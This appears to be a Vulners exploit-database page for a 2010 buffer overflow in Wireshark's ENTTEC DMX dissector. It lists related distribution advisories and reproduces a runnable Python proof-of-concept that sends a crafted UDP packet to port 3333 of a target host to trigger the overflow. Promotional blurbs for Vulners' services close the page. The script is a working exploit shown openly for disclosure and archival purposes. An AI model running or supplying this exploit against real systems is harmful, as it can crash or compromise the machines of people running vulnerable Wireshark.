| Reporter | Title | Published | Views | Family All 57 |
|---|---|---|---|---|
| CentOS 4 : wireshark (CESA-2011:0013) | 28 Jan 201100:00 | – | nessus | |
| Debian DSA-2144-1 : wireshark - buffer overflow | 17 Jan 201100:00 | – | nessus | |
| Fedora 14 : wireshark-1.4.2-2.fc14 (2011-0128) | 14 Jan 201100:00 | – | nessus | |
| Fedora 13 : wireshark-1.2.13-2.fc13 (2011-0167) | 14 Jan 201100:00 | – | nessus | |
| GLSA-201110-02 : Wireshark: Multiple vulnerabilities | 10 Oct 201100:00 | – | nessus | |
| Mandriva Linux Security Advisory : wireshark (MDVSA-2011:002) | 28 Jan 201100:00 | – | nessus | |
| MiracleLinux 3 : wireshark-1.0.15-1.3.0.1.AXS3 (AXSA:2011-03:01) | 14 Jan 202600:00 | – | nessus | |
| Oracle Linux 5 / 6 : wireshark (ELSA-2011-0013) | 12 Jul 201300:00 | – | nessus | |
| RHEL 4 / 5 / 6 : wireshark (RHSA-2011:0013) | 11 Jan 201100:00 | – | nessus | |
| Scientific Linux Security Update : wireshark on SL4.x, SL5.x i386/x86_64 | 1 Aug 201200:00 | – | nessus |
# source: https://www.securityfocus.com/bid/45634/info
#!/usr/bin/env python
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " <host>"
sys.exit(2)
port = 3333
addr = (host, port)
data = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
sys.exit(1)
udps.close()
sys.exit(0)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation